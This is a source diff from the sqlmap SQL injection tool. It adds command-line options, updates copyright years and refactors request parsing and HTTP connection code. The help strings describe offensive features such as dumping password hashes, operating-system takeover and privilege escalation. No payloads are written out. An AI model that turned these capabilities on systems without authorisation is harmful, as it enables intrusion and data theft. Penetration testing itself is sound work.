+            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self.__version)
+            self.__versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None
+
         elif name == "servicepack":
             self.__inServicePack = False
             self.__servicePack = self.__servicePack.replace(" ", "")

lib/parse/cmdline.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -51,7 +51,10 @@ def cmdLineParser():
         target.add_option("-u", "--url", dest="url", help="Target url")
 
         target.add_option("-l", dest="list", help="Parse targets from Burp "
-                          "or WebScarab logs")
+                          "or WebScarab proxy logs")
+
+        target.add_option("-r", dest="requestFile",
+                          help="Load HTTP request from a file")
 
         target.add_option("-g", dest="googleDork",
                           help="Process Google dork results as target urls")
@@ -72,7 +75,12 @@ def cmdLineParser():
         request.add_option("--cookie", dest="cookie",
                            help="HTTP Cookie header")
 
-        request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
+        request.add_option("--cookie-urlencode", dest="cookieUrlencode",
+                             action="store_true",
+                             help="URL Encode generated cookie injections")
+
+        request.add_option("--drop-set-cookie", dest="dropSetCookie",
+                           action="store_true",
                            help="Ignore Set-Cookie header from response")
 
         request.add_option("--user-agent", dest="agent",
@@ -89,20 +97,24 @@ def cmdLineParser():
                            help="Extra HTTP headers newline separated")
 
         request.add_option("--auth-type", dest="aType",
-                           help="HTTP Authentication type "
+                           help="HTTP authentication type "
                                 "(Basic, Digest or NTLM)")
 
         request.add_option("--auth-cred", dest="aCred",
-                           help="HTTP Authentication credentials "
+                           help="HTTP authentication credentials "
                                 "(name:password)")
                                 
         request.add_option("--auth-cert", dest="aCert",
-                           help="HTTPs Authentication certificate ("
+                           help="HTTP authentication certificate ("
                                 "key_file,cert_file)")
 
         request.add_option("--proxy", dest="proxy",
                            help="Use a HTTP proxy to connect to the target url")
 
+        request.add_option("--ignore-proxy", dest="ignoreProxy",
+                            action="store_true",
+                           help="Ignore system default HTTP proxy")
+
         request.add_option("--threads", dest="threads", type="int", default=1,
                            help="Maximum number of concurrent HTTP "
                                 "requests (default 1)")
@@ -118,6 +130,9 @@ def cmdLineParser():
                            help="Retries when the connection timeouts "
                                 "(default 3)")
 
+        request.add_option("--scope", dest="scope", 
+                           help="Regexp to filter targets from provided proxy log")
+
         # Injection options
         injection = OptionGroup(parser, "Injection", "These options can be "
                                 "used to specify which parameters to test "
@@ -226,25 +241,23 @@ def cmdLineParser():
 
         enumeration.add_option("--passwords", dest="getPasswordHashes",
                                action="store_true",
-                               help="Enumerate DBMS users password hashes (opt -U)")
+                               help="Enumerate DBMS users password hashes")
 
         enumeration.add_option("--privileges", dest="getPrivileges",
                                action="store_true",
-                               help="Enumerate DBMS users privileges (opt -U)")
+                               help="Enumerate DBMS users privileges")
 
         enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                                help="Enumerate DBMS databases")
 
         enumeration.add_option("--tables", dest="getTables", action="store_true",
-                               help="Enumerate DBMS database tables (opt -D)")
+                               help="Enumerate DBMS database tables")
 
         enumeration.add_option("--columns", dest="getColumns", action="store_true",
-                               help="Enumerate DBMS database table columns "
-                                    "(req -T opt -D)")
+                               help="Enumerate DBMS database table columns")
 
         enumeration.add_option("--dump", dest="dumpTable", action="store_true",
-                               help="Dump DBMS database table entries "
-                                    "(req -T, opt -D, -C)")
+                               help="Dump DBMS database table entries")
 
         enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
                                help="Dump all DBMS databases tables entries")
@@ -314,8 +327,8 @@ def cmdLineParser():
                                    "write to")
 
         # Takeover options
-        takeover = OptionGroup(parser, "Operating system access", "This "
-                               "option can be used to access the back-end "
+        takeover = OptionGroup(parser, "Operating system access", "These "
+                               "options can be used to access the back-end "
                                "database management system underlying "
                                "operating system.")
 
@@ -339,8 +352,7 @@ def cmdLineParser():
                                  "exploitation")
 
         takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
-                            help="User priv escalation by abusing Windows "
-                                 "access tokens")
+                            help="Database process' user privilege escalation")
 
         takeover.add_option("--msf-path", dest="msfPath",
                             help="Local path where Metasploit Framework 3 "
@@ -351,8 +363,8 @@ def cmdLineParser():
                                  "directory")
 
         # Windows registry options
-        windows = OptionGroup(parser, "Windows registry access", "This "
-                               "option can be used to access the back-end "
+        windows = OptionGroup(parser, "Windows registry access", "These "
+                               "options can be used to access the back-end "
                                "database management system Windows "
                                "registry.")
 
@@ -384,15 +396,18 @@ def cmdLineParser():
                                  help="Save and resume all data retrieved "
                                       "on a session file")
                                       
+        miscellaneous.add_option("--flush-session", dest="flushSession", action="store_true",
+                                 help="Flush session file for current target")
+                                      
         miscellaneous.add_option("--eta", dest="eta", action="store_true",
                                  help="Display for each output the "
                                       "estimated time of arrival")
 
         miscellaneous.add_option("--gpage", dest="googlePage", type="int",
-                               help="Use google dork results from specified page number")
+                                 help="Use google dork results from specified page number")
 
         miscellaneous.add_option("--update", dest="updateAll", action="store_true",
-                                help="Update sqlmap to the latest stable version")
+                                  help="Update sqlmap")
 
         miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
                                  help="Save options on a configuration INI file")
@@ -418,8 +433,8 @@ def cmdLineParser():
 
         (args, _) = parser.parse_args()
 
-        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.updateAll:
-            errMsg  = "missing a mandatory parameter ('-u', '-l', '-g', '-c' or '--update'), "
+        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.requestFile and not args.updateAll:
+            errMsg  = "missing a mandatory parameter ('-u', '-l', '-r', '-g', '-c' or '--update'), "
             errMsg += "-h for help"
             parser.error(errMsg)
 

lib/parse/configfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/headers.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/html.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/parse/queriesfile.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -137,16 +137,16 @@ class queriesHandler(ContentHandler):
         elif name == "inband":
             self.__inband    = sanitizeStr(attrs.get("query"))
             self.__inband2   = sanitizeStr(attrs.get("query2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionInband = sanitizeStr(attrs.get("condition"))
+            self.__conditionInband2 = sanitizeStr(attrs.get("condition2"))
 
         elif name == "blind":
             self.__blind  = sanitizeStr(attrs.get("query"))
             self.__blind2 = sanitizeStr(attrs.get("query2"))
             self.__count  = sanitizeStr(attrs.get("count"))
             self.__count2 = sanitizeStr(attrs.get("count2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionBlind = sanitizeStr(attrs.get("condition"))
+            self.__conditionBlind2 = sanitizeStr(attrs.get("condition2"))
 
     def endElement(self, name):
         if name == "dbms":
@@ -163,7 +163,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "passwords":
             self.__passwords = {}
-            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition }
+            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband }
             self.__passwords["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -171,7 +171,7 @@ class queriesHandler(ContentHandler):
 
         elif name == "privileges":
             self.__privileges = {}
-            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
             self.__privileges["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                            "count": self.__count, "count2": self.__count2 }
 
@@ -187,22 +187,22 @@ class queriesHandler(ContentHandler):
 
         elif name == "tables":
             self.__tables = {}
-            self.__tables["inband"] = { "query": self.__inband, "condition": self.__condition }
+            self.__tables["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
             self.__tables["blind"]  = { "query": self.__blind, "count": self.__count }
 
             self.__queries.tables = self.__tables
 
         elif name == "columns":
             self.__columns = {}
-            self.__columns["inband"] = { "query": self.__inband, "condition": self.__condition }
-            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__condition }
+            self.__columns["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
+            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__conditionBlind }
 
             self.__queries.columns = self.__columns
 
         elif name == "dump_column":
             self.__dumpColumn = {}
-            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
-            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
+            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__conditionBlind, "condition2": self.__conditionBlind2 }
 
             self.__queries.dumpColumn = self.__dumpColumn
 

lib/request/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/request/basic.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -28,9 +28,12 @@ import re
 import StringIO
 import zlib
 
+from lib.core.common import directoryPath
+from lib.core.common import isWindowsPath
+from lib.core.common import posixToNtSlashes
+from lib.core.common import urlEncodeCookieValues
 from lib.core.data import conf
 from lib.core.data import kb
-from lib.core.common import directoryPath
 from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 
@@ -44,6 +47,9 @@ def forgeHeaders(cookie, ua):
 
     for header, value in conf.httpHeaders:
         if cookie and header == "Cookie":
+            if conf.cookieUrlencode:
+                cookie = urlEncodeCookieValues(cookie)
+
             headers[header] = cookie
         elif ua and header == "User-Agent":
             headers[header] = ua
@@ -69,17 +75,19 @@ def parseResponse(page, headers):
         # Detect injectable page absolute system path
         # NOTE: this regular expression works if the remote web application
         # is written in PHP and debug/error messages are enabled.
-        absFilePathsRegExp = ( r" in <b>(?P<result>.*?)</b> on line",  r"\b(?P<result>[A-Za-z]:(\\[\w.\\]*)?)", r"(\A|[^<])(?P<result>/[/\w.]+)" )
+        absFilePathsRegExp = ( r" in <b>(?P<result>.*?)</b> on line",  r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)" )
 
         for absFilePathRegExp in absFilePathsRegExp:
             reobj = re.compile(absFilePathRegExp)
 
             for match in reobj.finditer(page):
                 absFilePath = match.group("result").strip()
-
+                page = page.replace(absFilePath, "")
+                if isWindowsPath(absFilePath):
+                    absFilePath = posixToNtSlashes(absFilePath)
                 if absFilePath not in kb.absFilePaths:
-                    dirname = directoryPath(absFilePath)
-                    kb.absFilePaths.add(dirname)
+                    kb.absFilePaths.add(absFilePath)
+                    
 
 def decodePage(page, encoding):
     """

lib/request/certhandler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/request/comparison.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -65,9 +65,15 @@ def comparison(page, headers=None, getSeqMatcher=False):
         else:
             return False
 
+    if conf.seqLock:
+        conf.seqLock.acquire()
+
     conf.seqMatcher.set_seq2(page)
     ratio = round(conf.seqMatcher.ratio(), 3)
 
+    if conf.seqLock:
+        conf.seqLock.release()
+
     # If the url is stable and we did not set yet the match ratio and the
     # current injected value changes the url page content
     if conf.matchRatio is None:

lib/request/connect.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -31,11 +31,11 @@ import urlparse
 import traceback
 
 from lib.contrib import multipartpost
-from lib.core.common import sanitizeCookie
 from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.common import sanitizeAsciiString
 from lib.core.exception import sqlmapConnectionException
 from lib.request.basic import decodePage
 from lib.request.basic import forgeHeaders
@@ -70,58 +70,58 @@ class Connect:
         direct    = kwargs.get('direct',    False)
         multipart = kwargs.get('multipart', False)
         silent    = kwargs.get('silent',    False)
+        raise404  = kwargs.get('raise404',  True)
 
         page            = ""
         cookieStr       = ""
         requestMsg      = "HTTP request:\n%s " % conf.method
+        requestMsg     += "%s" % urlparse.urlsplit(url)[2] or "/"
         responseMsg     = "HTTP response "
         requestHeaders  = ""
         responseHeaders = ""
 
-        if re.search("http[s]*://%s" % conf.hostname, url, re.I):
-            requestMsg += "%s" % conf.path or "/"
-        else:
-            requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/"
-
-        if silent:
-            socket.setdefaulttimeout(3)
-
-        if direct:
-            if "?" in url:
-                url, params = url.split("?")
-                params = urlencode(params)
-                url = "%s?%s" % (url, params)
-                requestMsg += "?%s" % params
-
-        elif multipart:
-            multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
-            conn = multipartOpener.open(url, multipart)
-            page = conn.read()
-            responseHeaders = conn.info()
-
-            encoding = responseHeaders.get("Content-Encoding")
-            page = decodePage(page, encoding)
-
-            return page
-
-        else:
-            if conf.parameters.has_key("GET") and not get:
-                get = conf.parameters["GET"]
-
-            if get:
-                get = urlencode(get)
-                url = "%s?%s" % (url, get)
-                requestMsg += "?%s" % get
-
-            if conf.method == "POST":
-                if conf.parameters.has_key("POST") and not post:
-                    post = conf.parameters["POST"]
-
-        requestMsg += " HTTP/1.1"
-
         try:
+            if silent:
+                socket.setdefaulttimeout(3)
+    
+            if direct:
+                if "?" in url:
+                    url, params = url.split("?")
+                    params = urlencode(params)
+                    url = "%s?%s" % (url, params)
+                    requestMsg += "?%s" % params
+    
+            elif multipart:
+                #needed in this form because of potential circle dependency problem (option -> update -> connect -> option)
+                from lib.core.option import proxyHandler
+                
+                multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
+                conn = multipartOpener.open(url, multipart)
+                page = conn.read()            
+                responseHeaders = conn.info()
+    
+                encoding = responseHeaders.get("Content-Encoding")
+                page = decodePage(page, encoding)
+    
+                return page
+    
+            else:
+                if conf.parameters.has_key("GET") and not get:
+                    get = conf.parameters["GET"]
+    
+                if get:
+                    get = urlencode(get)
+                    url = "%s?%s" % (url, get)
+                    requestMsg += "?%s" % get
+    
+                if conf.method == "POST":
+                    if conf.parameters.has_key("POST") and not post:
+                        post = conf.parameters["POST"]
+    
+            requestMsg += " HTTP/1.1"
+
             # Perform HTTP request
-            headers        = forgeHeaders(sanitizeCookie(cookie), ua)
+            headers        = forgeHeaders(cookie, ua)
             req            = urllib2.Request(url, post, headers)
             conn           = urllib2.urlopen(req)
 
@@ -172,26 +172,29 @@ class Connect:
                 exceptionMsg  = "not authorized, try to provide right HTTP "
                 exceptionMsg += "authentication type and valid credentials"
                 raise sqlmapConnectionException, exceptionMsg
+            elif e.code == 404 and raise404:
+                exceptionMsg = "page not found"
+                raise sqlmapConnectionException, exceptionMsg
             else:
                 page = e.read()
                 code = e.code
                 status = e.msg
                 responseHeaders = e.info()
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), _:
+                debugMsg = "got HTTP error code: %d" % code
+                logger.debug(debugMsg)
+
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), e:
             tbMsg = traceback.format_exc()
 
             if "URLError" in tbMsg or "error" in tbMsg:
                 warnMsg = "unable to connect to the target url"
-
             elif "timeout" in tbMsg:
                 warnMsg = "connection timed out to the target url"
-
             elif "BadStatusLine" in tbMsg:
                 warnMsg  = "the target url responded with an unknown HTTP "
                 warnMsg += "status code, try to force the HTTP User-Agent "
                 warnMsg += "header with option --user-agent or -a"
-
             else:
                 warnMsg = "unable to connect to the target url"
 
@@ -206,7 +209,6 @@ class Connect:
 
             if silent:
                 return None, None
-
             elif conf.retriesCount < conf.retries:
                 conf.retriesCount += 1
 
@@ -217,13 +219,14 @@ class Connect:
 
                 socket.setdefaulttimeout(conf.timeout)
                 return Connect.__getPageProxy(**kwargs)
-
             else:
                 socket.setdefaulttimeout(conf.timeout)
                 raise sqlmapConnectionException, warnMsg
 
         socket.setdefaulttimeout(conf.timeout)
 
+        page = sanitizeAsciiString(page)
+        
         parseResponse(page, responseHeaders)
         responseMsg += "(%s - %d):\n" % (status, code)
         

lib/request/inject.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under